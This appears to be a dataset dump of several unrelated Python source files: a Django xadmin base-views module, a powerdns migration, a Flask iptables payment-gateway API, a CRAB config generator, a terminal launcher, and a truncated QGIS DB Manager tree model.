code
stringlengths 658
1.05M
|
---|
import sys
import copy
import functools
import datetime
import decimal
from functools import update_wrapper
from inspect import getargspec
from django import forms
from django.utils.encoding import force_unicode
from django.conf import settings
from django.contrib import messages
from django.core.exceptions import ValidationError
from django.core.serializers.json import DjangoJSONEncoder
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.template import Context, Template
from django.template.response import TemplateResponse
from django.utils.datastructures import SortedDict
from django.utils.decorators import method_decorator, classonlymethod
from django.utils.encoding import smart_unicode
from django.utils.http import urlencode
from django.utils.itercompat import is_iterable
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from django.views.decorators.csrf import csrf_protect
from django.views.generic import View
from xadmin.util import static, json, vendor, sortkeypicker
csrf_protect_m = method_decorator(csrf_protect)
class IncorrectPluginArg(Exception):
pass
def filter_chain(filters, token, func, *args, **kwargs):
if token == -1:
return func()
else:
def _inner_method():
fm = filters[token]
fargs = getargspec(fm)[0]
if len(fargs) == 1:
# Only self arg
result = func()
if result is None:
return fm()
else:
raise IncorrectPluginArg(u'Plugin filter method need a arg to receive parent method result.')
else:
return fm(func if fargs[1] == '__' else func(), *args, **kwargs)
return filter_chain(filters, token - 1, _inner_method, *args, **kwargs)
def filter_hook(func):
tag = func.__name__
func.__doc__ = "``filter_hook``\n\n" + (func.__doc__ or "")
@functools.wraps(func)
def method(self, *args, **kwargs):
def _inner_method():
return func(self, *args, **kwargs)
if self.plugins:
filters = [(getattr(getattr(p, tag), 'priority', 10), getattr(p, tag))
for p in self.plugins if callable(getattr(p, tag, None))]
filters = [f for p, f in sorted(filters, key=lambda x:x[0])]
return filter_chain(filters, len(filters) - 1, _inner_method, *args, **kwargs)
else:
return _inner_method()
return method
def inclusion_tag(file_name, context_class=Context, takes_context=False):
def wrap(func):
@functools.wraps(func)
def method(self, context, nodes, *arg, **kwargs):
_dict = func(self, context, nodes, *arg, **kwargs)
from django.template.loader import get_template, select_template
if isinstance(file_name, Template):
t = file_name
elif not isinstance(file_name, basestring) and is_iterable(file_name):
t = select_template(file_name)
else:
t = get_template(file_name)
new_context = context_class(_dict, **{
'autoescape': context.autoescape,
'current_app': context.current_app,
'use_l10n': context.use_l10n,
'use_tz': context.use_tz,
})
new_context['admin_view'] = context['admin_view']
csrf_token = context.get('csrf_token', None)
if csrf_token is not None:
new_context['csrf_token'] = csrf_token
nodes.append(t.render(new_context))
return method
return wrap
class JSONEncoder(DjangoJSONEncoder):
def default(self, o):
if isinstance(o, datetime.date):
return o.strftime('%Y-%m-%d')
elif isinstance(o, datetime.datetime):
return o.strftime('%Y-%m-%d %H:%M:%S')
elif isinstance(o, decimal.Decimal):
return str(o)
else:
try:
return super(JSONEncoder, self).default(o)
except Exception:
return smart_unicode(o)
class BaseAdminObject(object):
def get_view(self, view_class, option_class=None, *args, **kwargs):
opts = kwargs.pop('opts', {})
return self.admin_site.get_view_class(view_class, option_class, **opts)(self.request, *args, **kwargs)
def get_model_view(self, view_class, model, *args, **kwargs):
return self.get_view(view_class, self.admin_site._registry.get(model), *args, **kwargs)
def get_admin_url(self, name, *args, **kwargs):
return reverse('%s:%s' % (self.admin_site.app_name, name), args=args, kwargs=kwargs)
def get_model_url(self, model, name, *args, **kwargs):
return reverse(
'%s:%s_%s_%s' % (self.admin_site.app_name, model._meta.app_label,
model._meta.module_name, name),
args=args, kwargs=kwargs, current_app=self.admin_site.name)
def get_model_perm(self, model, name):
return '%s.%s_%s' % (model._meta.app_label, name, model._meta.module_name)
def has_model_perm(self, model, name, user=None):
user = user or self.user
return user.has_perm(self.get_model_perm(model, name)) or (name == 'view' and self.has_model_perm(model, 'change', user))
def get_query_string(self, new_params=None, remove=None):
if new_params is None:
new_params = {}
if remove is None:
remove = []
p = dict(self.request.GET.items()).copy()
for r in remove:
for k in p.keys():
if k.startswith(r):
del p[k]
for k, v in new_params.items():
if v is None:
if k in p:
del p[k]
else:
p[k] = v
return '?%s' % urlencode(p)
def get_form_params(self, new_params=None, remove=None):
if new_params is None:
new_params = {}
if remove is None:
remove = []
p = dict(self.request.GET.items()).copy()
for r in remove:
for k in p.keys():
if k.startswith(r):
del p[k]
for k, v in new_params.items():
if v is None:
if k in p:
del p[k]
else:
p[k] = v
return mark_safe(''.join(
'<input type="hidden" name="%s" value="%s"/>' % (k, v) for k, v in p.items() if v))
def render_response(self, content, response_type='json'):
if response_type == 'json':
response = HttpResponse(mimetype="application/json; charset=UTF-8")
response.write(
json.dumps(content, cls=JSONEncoder, ensure_ascii=False))
return response
return HttpResponse(content)
def template_response(self, template, context):
return TemplateResponse(self.request, template, context, current_app=self.admin_site.name)
def message_user(self, message, level='info'):
"""
Send a message to the user. The default implementation
posts a message using the django.contrib.messages backend.
"""
if hasattr(messages, level) and callable(getattr(messages, level)):
getattr(messages, level)(self.request, message)
def static(self, path):
return static(path)
def vendor(self, *tags):
return vendor(*tags)
class BaseAdminPlugin(BaseAdminObject):
def __init__(self, admin_view):
self.admin_view = admin_view
self.admin_site = admin_view.admin_site
if hasattr(admin_view, 'model'):
self.model = admin_view.model
self.opts = admin_view.model._meta
def init_request(self, *args, **kwargs):
pass
class BaseAdminView(BaseAdminObject, View):
""" Base Admin view, support some comm attrs."""
base_template = 'xadmin/base.html'
need_site_permission = True
def __init__(self, request, *args, **kwargs):
self.request = request
self.request_method = request.method.lower()
self.user = request.user
self.base_plugins = [p(self) for p in getattr(self,
"plugin_classes", [])]
self.args = args
self.kwargs = kwargs
self.init_plugin(*args, **kwargs)
self.init_request(*args, **kwargs)
@classonlymethod
def as_view(cls):
def view(request, *args, **kwargs):
self = cls(request, *args, **kwargs)
if hasattr(self, 'get') and not hasattr(self, 'head'):
self.head = self.get
if self.request_method in self.http_method_names:
handler = getattr(
self, self.request_method, self.http_method_not_allowed)
else:
handler = self.http_method_not_allowed
return handler(request, *args, **kwargs)
# take name and docstring from class
update_wrapper(view, cls, updated=())
view.need_site_permission = cls.need_site_permission
return view
def init_request(self, *args, **kwargs):
pass
def init_plugin(self, *args, **kwargs):
plugins = []
for p in self.base_plugins:
p.request = self.request
p.user = self.user
p.args = self.args
p.kwargs = self.kwargs
result = p.init_request(*args, **kwargs)
if result is not False:
plugins.append(p)
self.plugins = plugins
@filter_hook
def get_context(self):
return {'admin_view': self, 'media': self.media, 'base_template': self.base_template}
@property
def media(self):
return self.get_media()
@filter_hook
def get_media(self):
return forms.Media()
class CommAdminView(BaseAdminView):
base_template = 'xadmin/base_site.html'
menu_template = 'xadmin/includes/sitemenu_default.html'
site_title = None
global_models_icon = {}
default_model_icon = None
apps_label_title = {}
apps_icons = {}
apps_label_order = {}
def get_site_menu(self):
return None
@filter_hook
def get_nav_menu(self):
site_menu = list(self.get_site_menu() or [])
had_urls = []
def get_url(menu, had_urls):
if 'url' in menu:
had_urls.append(menu['url'])
if 'menus' in menu:
for m in menu['menus']:
get_url(m, had_urls)
get_url({'menus': site_menu}, had_urls)
nav_menu = SortedDict()
for model, model_admin in self.admin_site._registry.items():
if getattr(model_admin, 'hidden_menu', False):
continue
app_label = model._meta.app_label
app_icon = None
model_dict = {
'title': unicode(capfirst(model._meta.verbose_name_plural)),
'url': self.get_model_url(model, "changelist"),
'icon': self.get_model_icon(model),
'perm': self.get_model_perm(model, 'view'),
'order': model_admin.order,
}
if model_dict['url'] in had_urls:
continue
app_key = "app:%s" % app_label
if app_key in nav_menu:
nav_menu[app_key]['menus'].append(model_dict)
else:
# Find app title
app_title = unicode(app_label.title())
if app_label.lower() in self.apps_label_title:
app_title = self.apps_label_title[app_label.lower()]
else:
mods = model.__module__.split('.')
if len(mods) > 1:
mod = '.'.join(mods[0:-1])
if mod in sys.modules:
mod = sys.modules[mod]
if 'verbose_name' in dir(mod):
app_title = getattr(mod, 'verbose_name')
elif 'app_title' in dir(mod):
app_title = getattr(mod, 'app_title')
#find app icon
if app_label.lower() in self.apps_icons:
app_icon = self.apps_icons[app_label.lower()]
#find app order
app_order = None
if app_label in self.apps_label_order:
app_order = self.apps_label_order[app_label]
nav_menu[app_key] = {
'title': app_title,
'menus': [model_dict],
'order': app_order
}
app_menu = nav_menu[app_key]
if app_icon:
app_menu['first_icon'] = app_icon
elif ('first_icon' not in app_menu or
app_menu['first_icon'] == self.default_model_icon) and model_dict.get('icon'):
app_menu['first_icon'] = model_dict['icon']
if 'first_url' not in app_menu and model_dict.get('url'):
app_menu['first_url'] = model_dict['url']
for menu in nav_menu.values():
menu['menus'].sort(key=sortkeypicker(['order', 'title']))
nav_menu = nav_menu.values()
nav_menu.sort(key=lambda x: (x['order'], x['title']))
site_menu.extend(nav_menu)
return site_menu
@filter_hook
def get_context(self):
context = super(CommAdminView, self).get_context()
if not settings.DEBUG and 'nav_menu' in self.request.session:
nav_menu = json.loads(self.request.session['nav_menu'])
else:
menus = copy.copy(self.get_nav_menu())
def check_menu_permission(item):
need_perm = item.pop('perm', None)
if need_perm is None:
return True
elif callable(need_perm):
return need_perm(self.user)
elif need_perm == 'super':
return self.user.is_superuser
else:
return self.user.has_perm(need_perm)
def filter_item(item):
if 'menus' in item:
before_filter_length = len(item['menus'])
item['menus'] = [filter_item(
i) for i in item['menus'] if check_menu_permission(i)]
after_filter_length = len(item['menus'])
# if user have no access to all submenus, this menu item should be removed
if after_filter_length == 0 and before_filter_length > 0:
return None
return item
nav_menu = [filter_item(item) for item in menus if check_menu_permission(item)]
nav_menu = filter(lambda x:x, nav_menu)
if not settings.DEBUG:
self.request.session['nav_menu'] = json.dumps(nav_menu)
self.request.session.modified = True
def check_selected(menu, path):
selected = False
if 'url' in menu:
chop_index = menu['url'].find('?')
if chop_index == -1:
selected = path.startswith(menu['url'])
else:
selected = path.startswith(menu['url'][:chop_index])
if 'menus' in menu:
for m in menu['menus']:
_s = check_selected(m, path)
if _s:
selected = True
if selected:
menu['selected'] = True
return selected
for menu in nav_menu:
check_selected(menu, self.request.path)
context.update({
'menu_template': self.menu_template,
'nav_menu': nav_menu,
'site_title': self.site_title or _(u'Django Xadmin'),
'breadcrumbs': self.get_breadcrumb()
})
return context
@filter_hook
def get_model_icon(self, model):
icon = self.global_models_icon.get(model)
if icon is None and model in self.admin_site._registry:
icon = getattr(self.admin_site._registry[model],
'model_icon', self.default_model_icon)
return icon
@filter_hook
def get_breadcrumb(self):
return [{
'url': self.get_admin_url('index'),
'title': _('Home')
}]
class ModelAdminView(CommAdminView):
fields = None
exclude = None
ordering = None
model = None
remove_permissions = []
def __init__(self, request, *args, **kwargs):
self.opts = self.model._meta
self.app_label = self.model._meta.app_label
self.module_name = self.model._meta.module_name
self.model_info = (self.app_label, self.module_name)
super(ModelAdminView, self).__init__(request, *args, **kwargs)
@filter_hook
def get_context(self):
new_context = {
"opts": self.opts,
"app_label": self.app_label,
"module_name": self.module_name,
"verbose_name": force_unicode(self.opts.verbose_name),
'model_icon': self.get_model_icon(self.model),
}
context = super(ModelAdminView, self).get_context()
context.update(new_context)
return context
@filter_hook
def get_breadcrumb(self):
bcs = super(ModelAdminView, self).get_breadcrumb()
item = {'title': self.opts.verbose_name_plural}
if self.has_view_permission():
item['url'] = self.model_admin_url('changelist')
bcs.append(item)
return bcs
@filter_hook
def get_object(self, object_id):
"""
Get model object instance by object_id, used for change admin view
"""
# first get base admin view property queryset, return default model queryset
queryset = self.queryset()
model = queryset.model
try:
object_id = model._meta.pk.to_python(object_id)
return queryset.get(pk=object_id)
except (model.DoesNotExist, ValidationError):
return None
@filter_hook
def get_object_url(self, obj):
if self.has_change_permission(obj):
return self.model_admin_url("change", getattr(obj, self.opts.pk.attname))
elif self.has_view_permission(obj):
return self.model_admin_url("detail", getattr(obj, self.opts.pk.attname))
else:
return None
def model_admin_url(self, name, *args, **kwargs):
return reverse(
"%s:%s_%s_%s" % (self.admin_site.app_name, self.opts.app_label,
self.module_name, name), args=args, kwargs=kwargs)
def get_model_perms(self):
"""
Returns a dict of all perms for this model. This dict has the keys
``add``, ``change``, and ``delete`` mapping to the True/False for each
of those actions.
"""
return {
'view': self.has_view_permission(),
'add': self.has_add_permission(),
'change': self.has_change_permission(),
'delete': self.has_delete_permission(),
}
def get_template_list(self, template_name):
opts = self.opts
return (
"xadmin/%s/%s/%s" % (
opts.app_label, opts.object_name.lower(), template_name),
"xadmin/%s/%s" % (opts.app_label, template_name),
"xadmin/%s" % template_name,
)
def get_ordering(self):
"""
Hook for specifying field ordering.
"""
return self.ordering or () # otherwise we might try to *None, which is bad ;)
def queryset(self):
"""
Returns a QuerySet of all model instances that can be edited by the
admin site. This is used by changelist_view.
"""
return self.model._default_manager.get_query_set()
def has_view_permission(self, obj=None):
return ('view' not in self.remove_permissions) and (self.user.has_perm('%s.view_%s' % self.model_info) or \
self.user.has_perm('%s.change_%s' % self.model_info))
def has_add_permission(self):
return ('add' not in self.remove_permissions) and self.user.has_perm('%s.add_%s' % self.model_info)
def has_change_permission(self, obj=None):
return ('change' not in self.remove_permissions) and self.user.has_perm('%s.change_%s' % self.model_info)
def has_delete_permission(self, obj=None):
return ('delete' not in self.remove_permissions) and self.user.has_perm('%s.delete_%s' % self.model_info)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import django.core.validators
import powerdns.models.powerdns
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
('powerdns', '0010_auto_20150921_0613'),
]
operations = [
migrations.CreateModel(
name='Authorisation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('target_id', models.PositiveIntegerField()),
('authorised', models.ForeignKey(related_name='received_authorisations', to=settings.AUTH_USER_MODEL)),
('content_type', models.ForeignKey(to='contenttypes.ContentType')),
('owner', models.ForeignKey(related_name='issued_authorisations', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AlterField(
model_name='domain',
name='name',
field=models.CharField(verbose_name='name', unique=True, max_length=255, validators=[django.core.validators.RegexValidator('^(\\*\\.)?([_A-Za-z0-9-]+\\.)*([A-Za-z0-9])+$'), powerdns.models.powerdns.SubDomainValidator()]),
),
]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
PGW
~~~~~~
Payment gateways VNF with RESTful API.
:copyright: (c) 2015 by Anton K. Komarov.
:license: MIT, see LICENSE for more details.
"""
import os
import sqlite3
from flask import Flask, g, abort, jsonify
from flask.ext.restful import Api, Resource, reqparse, fields, marshal
from contextlib import closing
import iptc
import dns.resolver
pgw_fields = {
'domain': fields.String,
'uri': fields.Url('pgw',absolute=True)
}
app = Flask(__name__)
app.config.from_object(__name__)
api = Api(app)
app.config.update(dict(
DATABASE=os.path.join(app.root_path, 'pgw.db'),
INTF_IN='eth1',
PORTAL_IP='127.0.0.1:80',
DEBUG=True,
))
app.config.from_envvar('PGW_SETTINGS', silent=True)
def connect_db():
"""Connects to the specific database."""
rv = sqlite3.connect(app.config['DATABASE'])
rv.row_factory = sqlite3.Row
return rv
def init_db():
"""Initializes the database."""
db = get_db()
with app.open_resource('schema.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
@app.cli.command('initdb')
def initdb_command():
"""Creates the database tables."""
init_db()
print('Initialized the database.')
def get_db():
"""Opens a new database connection if there is none yet for the
current application context.
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = connect_db()
return g.sqlite_db
def query_db(query, args=(), one=False):
"""A query function that combines getting the cursor,
executing and fetching the results.
"""
db=get_db()
cur = db.execute(query, args)
rv = cur.fetchall()
cur.close()
db.commit()
return (rv[0] if rv else None) if one else rv
def tbl_prep():
"""Prepare table NAT and two chains."""
tblf=iptc.Table(iptc.Table.NAT)
tblf.flush()
chain_pr = iptc.Chain(tblf, 'PREROUTING')
chain_pr.flush()
chain_pgw = tblf.create_chain('PAYMENT_GW')
rule = iptc.Rule()
rule.protocol='udp'
rule.create_target('ACCEPT')
m = rule.create_match('udp')
m.dport='53'
rule.in_interface=app.config['INTF_IN']
chain_pr.append_rule(rule)
rule = iptc.Rule()
rule.create_target('PAYMENT_GW')
rule.protocol='tcp'
rule.in_interface=app.config['INTF_IN']
chain_pr.append_rule(rule)
rule = iptc.Rule()
rule.protocol='tcp'
rule.in_interface=app.config['INTF_IN']
t = rule.create_target('DNAT')
t.to_destination=app.config['PORTAL_IP']
m = rule.create_match('tcp')
m.dport='80'
chain_pr.append_rule(rule)
rule = iptc.Rule()
rule.create_target('DROP')
rule.in_interface=app.config['INTF_IN']
chain_pr.append_rule(rule)
return chain_pgw
def query_dns(host_list):
"""Get host ip mappings from DNS records."""
collection = {}
for host in host_list:
try:
res = dns.resolver.query(host['domain'],'A')
for a in res:
collection[a.address]=host['domain']
except:
pass
return collection
@app.route('/pgw/api/v1.0/pgws/reload')
def reload_pgw():
"""Reload iptables structure from scratch."""
pgws=query_db('select domain from pgws order by id')
chain_pgw=tbl_prep()
for pgw in pgws:
append_pgw(pgw[0])
return jsonify({'result': True}), 202
def append_pgw(pgw):
"""Append payment gw to iptables chain."""
chain_pgw = iptc.Chain(iptc.Table(iptc.Table.NAT),'PAYMENT_GW')
if not iptc.Table(iptc.Table.NAT).is_chain(chain_pgw):
tbl_prep()
collection=query_dns([{'domain':pgw},])
for ip,host in collection.items():
rule = iptc.Rule()
rule.create_target('ACCEPT')
m = rule.create_match('comment')
m.comment=str(host)
rule.dst=str(ip)
chain_pgw.append_rule(rule)
return len(collection)
def delete_pgw(pgw):
""" Delete payment gw from iptables chain."""
table = iptc.Table(iptc.Table.NAT)
table.autocommit = False
chain_pgw = iptc.Chain(table,'PAYMENT_GW')
if not iptc.Table(iptc.Table.NAT).is_chain(chain_pgw):
tbl_prep()
return
for r in chain_pgw.rules:
for m in r.matches:
if 'comment' in m.parameters:
if m.parameters['comment']==pgw:
chain_pgw.delete_rule(r)
table.commit()
table.refresh()
table.autocommit = True
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'sqlite_db'):
g.sqlite_db.close()
class PgwListAPI(Resource):
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument('domain', type=str, required=True,
help='No domain provided',
location='json')
super(PgwListAPI, self).__init__()
def get(self):
pgws=query_db('select id, domain from pgws order by id desc')
return {'pgws': [marshal(pgw, pgw_fields) for pgw in pgws]}
def post(self):
args = self.reqparse.parse_args()
pgws=query_db('select id, domain from pgws where domain=?', [args['domain'],])
if len(pgws)==0:
if (append_pgw(args['domain'])>0):
query_db('insert into pgws (domain) values (?)', [args['domain'],])
pgws = query_db('select id, domain from pgws order by id desc')
return {'pgws': [marshal(pgw, pgw_fields) for pgw in pgws]}, 201
else:
return {'result': False}, 406
class PgwAPI(Resource):
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument('domain', type=str, location='json')
super(PgwAPI, self).__init__()
def get(self, id):
pgw = query_db('select id, domain from pgws where id=?', [id,])
if len(pgw) == 0:
abort(404)
return {'pgw': marshal(pgw[0], pgw_fields)}
def delete(self, id):
pgw=query_db('select domain from pgws where id=?', [id,])
delete_pgw(str(pgw[0][0]))
query_db('delete from pgws where id=?', [id,])
return {'result': True}
api.add_resource(PgwListAPI, '/pgw/api/v1.0/pgws', endpoint='pgws')
api.add_resource(PgwAPI, '/pgw/api/v1.0/pgws/<int:id>', endpoint='pgw')
if __name__ == '__main__':
app.run()
|
#!/bin/env python
#*******************************************************************************
#
# Filename : 01_run_baseline_selection.sh
# Description : Submitting all designated datasets to crab
# Author : Yi-Mu "Enoch" Chen [ [email protected] ]
#
#*******************************************************************************
import TstarAnalysis.RunSequence.Naming as myname
import TstarAnalysis.RunSequence.Settings as mysetting
import TstarAnalysis.RunSequence.PathVars as mypath
import sys, os
import optparse
#-------------------------------------------------------------------------------
# Defining global variables
#-------------------------------------------------------------------------------
config_file_default = """
from CRABClient.UserUtilities import config
config = config()
config.General.requestName = '{0}'
config.General.workArea = '{1}'
config.General.transferOutputs = True
config.General.transferLogs = False
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = '{2}'
config.JobType.maxMemoryMB = 2500
## Input parameters
config.JobType.pyCfgParams = [
'Mode={3}',
'GlobalTag={4}',
]
{5}
config.Data.inputDataset = '{6}'
config.Data.inputDBS = 'global'
config.Data.splitting = '{7}'
config.Data.unitsPerJob = {8}
config.Data.outLFNDirBase = '{9}'
config.Data.publication = False
config.Site.storageSite = '{10}'
"""
#-------------------------------------------------------------------------------
# Main control flows
#-------------------------------------------------------------------------------
def MakeCrabFile( dataset, opt ):
# Preparing variables
task_name = myname.GetTaskName( 'tstar' , dataset , opt.mode )
work_area = mysetting.crab_work_dir
run_file = mysetting.cmsrun_dir + 'run_baseline_selection.py'
mode = opt.mode
global_tag = myname.GetGlobalTag( dataset )
splittype = ""
lumimask = ""
splitunit = 0
hlt = myname.GetHLT(dataset)
lfn_dir = mysetting.crab_default_path
site = mysetting.crab_site
if myname.IsData( dataset ):
splittype = 'LumiBased'
splitunit = 480 * 60 # target time in seconds
splitunit = splitunit / 0.033 # real time per event
splitunit = splitunit / 4000 # average number of events in lumi
else:
splittype = 'LumiBased'
splitunit = 480 * 2 * 60 # target time in seconds
splitunit = splitunit / 0.033 # real time per event
splitunit = splitunit / 200 # average number of events in lumi
file_content = config_file_default.format(
task_name , #{0}
work_area , #{1}
run_file , #{2}
mode , #{3}
global_tag , #{4}
lumimask , #{5}
dataset , #{6}
splittype , #{7}
int(splitunit) , #{8}
lfn_dir , #{9}
site , #{10}
)
## Writing to Crab file
crab_config_file = myname.GetCrabFile('tstar',dataset,opt.mode)
my_file = open( crab_config_file , 'w' )
my_file.write( file_content )
my_file.close()
return crab_config_file
def main():
parser = optparse.OptionParser()
parser.add_option('-i', '--inputlist', dest='input', help='list of data sets to generate', default=None, type='string')
parser.add_option('-m', '--mode', dest='mode', help='which mode to run with', default=None, type='string')
(opt,args) = parser.parse_args()
if not opt.input or not opt.mode:
print "Error! [input] nad [mode] inputs are obligatory!"
parser.print_help()
return
with open(opt.input) as f:
dataset_list = f.readlines()
for dataset in dataset_list :
dataset = dataset.strip()
crab_file = MakeCrabFile( dataset, opt )
print "Written config to", crab_file
if __name__ == "__main__":
sys.exit(main())
|
# coding: utf-8
from __future__ import unicode_literals, division, absolute_import, print_function
import sys
if sys.platform == 'win32':
from ._win import launch_powershell, launch_cmd, launch_executable
elif sys.platform == 'darwin':
from ._osx import launch_terminal_app, launch_iterm_app
from ._posix import launch_executable
else:
from ._linux import get_default_terminal
from ._posix import launch_executable
from ._types import verify_unicode, verify_unicode_list, verify_unicode_dict
__version__ = '1.0.0'
__version_info__ = (1, 0, 0)
def launch_terminal(cwd, env=None, terminal=None, args=None, width=1024, use_tabs=False):
"""
Launches a terminal at the directory specified
:param cwd:
A unicode string of the working directory to open the terminal to
:param env:
A dict of unicode strings for a custom environmental variables to set
:param terminal:
A unicode string of the name of the terminal to execute. If None, uses
the OS default. Special OS X values include: "Terminal.app" and
"iTerm.app". Special Windows values include: "powershell.exe" and
"cmd.exe". All others are launched as a subprocess and must pick up the
cwd and env from the Python subprocess module.
:param args:
A list of unicode strings of the arguments to pass to the terminal
executable. Ignored when terminal is set to any of:
- "Terminal.app"
- "iTerm.app",
- "cmd.exe"
- "powershell.exe"
:param width:
Windows only: an integer of the width of the terminal window when
terminal is None, "powershell.exe" or "cmd.exe"
:param use_tabss:
OS X only: a boolean if tabs should be used instead of new windows when
terminal is None, "Terminal.app" or "iTerm.app"
"""
verify_unicode(cwd, 'cwd')
verify_unicode_dict(env, 'env')
verify_unicode(terminal, 'terminal', allow_none=True)
verify_unicode_list(args, 'args', allow_none=True)
if sys.platform == 'darwin':
if terminal is None or terminal == 'Terminal.app':
launch_terminal_app(cwd, env=env, use_tabs=use_tabs)
elif terminal == 'iTerm.app':
launch_iterm_app(cwd, env=env, use_tabs=use_tabs)
else:
launch_executable(terminal, args, cwd, env=env)
elif sys.platform == 'win32':
if terminal is None or terminal == 'powershell.exe':
launch_powershell(cwd, env=env, width=width)
elif terminal == 'cmd.exe':
launch_cmd(cwd, env=env, width=width)
else:
launch_executable(terminal, args, cwd, env=env)
else:
if terminal is None:
terminal = get_default_terminal()
launch_executable(terminal, args, cwd, env=env)
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS
Date : May 23, 2011
copyright : (C) 2011 by Giuseppe Sucameli
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from builtins import str
from builtins import range
from functools import partial
from qgis.PyQt.QtCore import Qt, QObject, qDebug, QByteArray, QMimeData, QDataStream, QIODevice, QFileInfo, QAbstractItemModel, QModelIndex, pyqtSignal
from qgis.PyQt.QtWidgets import QApplication, QMessageBox
from qgis.PyQt.QtGui import QIcon
from .db_plugins import supportedDbTypes, createDbPlugin
from .db_plugins.plugin import BaseError, Table, Database
from .dlg_db_error import DlgDbError
from qgis.core import QgsDataSourceUri, QgsVectorLayer, QgsRasterLayer, QgsMimeDataUtils
from qgis.utils import OverrideCursor
from . import resources_rc # NOQA
try:
from qgis.core import QgsVectorLayerExporter # NOQA
isImportVectorAvail = True
except:
isImportVectorAvail = False
class TreeItem(QObject):
deleted = pyqtSignal()
changed = pyqtSignal()
def __init__(self, data, parent=None):
QObject.__init__(self, parent)
self.populated = False
self.itemData = data
self.childItems = []
if parent:
parent.appendChild(self)
def childRemoved(self):
self.itemChanged()
def itemChanged(self):
self.changed.emit()
def itemDeleted(self):
self.deleted.emit()
def populate(self):
self.populated = True
return True
def getItemData(self):
return self.itemData
def appendChild(self, child):
self.childItems.append(child)
child.deleted.connect(self.childRemoved)
def child(self, row):
return self.childItems[row]
def removeChild(self, row):
if row >= 0 and row < len(self.childItems):
self.childItems[row].itemData.deleteLater()
self.childItems[row].deleted.disconnect(self.childRemoved)
del self.childItems[row]
def childCount(self):
return len(self.childItems)
def columnCount(self):
return 1
def row(self):
if self.parent():
for row, item in enumerate(self.parent().childItems):
if item is self:
return row
return 0
def data(self, column):
return "" if column == 0 else None
def icon(self):
return None
def path(self):
pathList = []
if self.parent():
pathList.extend(self.parent().path())
pathList.append(self.data(0))
return pathList
class PluginItem(TreeItem):
def __init__(self, dbplugin, parent=None):
TreeItem.__init__(self, dbplugin, parent)
def populate(self):
if self.populated:
return True
# create items for connections
for c in self.getItemData().connections():
ConnectionItem(c, self)
self.populated = True
return True
def data(self, column):
if column == 0:
return self.getItemData().typeNameString()
return None
def icon(self):
return self.getItemData().icon()
def path(self):
return [self.getItemData().typeName()]
class ConnectionItem(TreeItem):
def __init__(self, connection, parent=None):
TreeItem.__init__(self, connection, parent)
connection.changed.connect(self.itemChanged)
connection.deleted.connect(self.itemDeleted)
# load (shared) icon with first instance of table item
if not hasattr(ConnectionItem, 'connectedIcon'):
ConnectionItem.connectedIcon = QIcon(":/db_manager/icons/plugged.png")
ConnectionItem.disconnectedIcon = QIcon(":/db_manager/icons/unplugged.png")
def data(self, column):
if column == 0:
return self.getItemData().connectionName()
return None
def populate(self):
if self.populated:
return True
connection = self.getItemData()
if connection.database() is None:
# connect to database
try:
if not connection.connect():
return False
except BaseError as e:
DlgDbError.showError(e, None)
return False
database = connection.database()
database.changed.connect(self.itemChanged)
database.deleted.connect(self.itemDeleted)
schemas = database.schemas()
if schemas is not None:
for s in schemas:
SchemaItem(s, self)
else:
tables = database.tables()
for t in tables:
TableItem(t, self)
self.populated = True
return True
def isConnected(self):
return self.getItemData().database() is not None
# def icon(self):
# return self.connectedIcon if self.isConnected() else self.disconnectedIcon
class SchemaItem(TreeItem):
def __init__(self, schema, parent):
TreeItem.__init__(self, schema, parent)
schema.changed.connect(self.itemChanged)
schema.deleted.connect(self.itemDeleted)
# load (shared) icon with first instance of schema item
if not hasattr(SchemaItem, 'schemaIcon'):
SchemaItem.schemaIcon = QIcon(":/db_manager/icons/namespace.png")
def data(self, column):
if column == 0:
return self.getItemData().name
return None
def icon(self):
return self.schemaIcon
def populate(self):
if self.populated:
return True
for t in self.getItemData().tables():
TableItem(t, self)
self.populated = True
return True
class TableItem(TreeItem):
def __init__(self, table, parent):
TreeItem.__init__(self, table, parent)
table.changed.connect(self.itemChanged)
table.deleted.connect(self.itemDeleted)
self.populate()
# load (shared) icon with first instance of table item
if not hasattr(TableItem, 'tableIcon'):
TableItem.tableIcon = QIcon(":/db_manager/icons/table.png")
TableItem.viewIcon = QIcon(":/db_manager/icons/view.png")
TableItem.viewMaterializedIcon = QIcon(":/db_manager/icons/view_materialized.png")
TableItem.layerPointIcon = QIcon(":/db_manager/icons/layer_point.png")
TableItem.layerLineIcon = QIcon(":/db_manager/icons/layer_line.png")
TableItem.layerPolygonIcon = QIcon(":/db_manager/icons/layer_polygon.png")
TableItem.layerRasterIcon = QIcon(":/db_manager/icons/layer_raster.png")
TableItem.layerUnknownIcon = QIcon(":/db_manager/icons/layer_unknown.png")
def data(self, column):
if column == 0:
return self.getItemData().name
elif column == 1:
if self.getItemData().type == Table.VectorType:
return self.getItemData().geomType
return None
def icon(self):
if self.getItemData().type == Table.VectorType:
geom_type = self.getItemData().geomType
if geom_type is not None:
if geom_type.find('POINT') != -1:
return self.layerPointIcon
elif geom_type.find('LINESTRING') != -1 or geom_type in ('CIRCULARSTRING', 'COMPOUNDCURVE', 'MULTICURVE'):
return self.layerLineIcon
elif geom_type.find('POLYGON') != -1 or geom_type == 'MULTISURFACE':
return self.layerPolygonIcon
return self.layerUnknownIcon
elif self.getItemData().type == Table.RasterType:
return self.layerRasterIcon
if self.getItemData().isView:
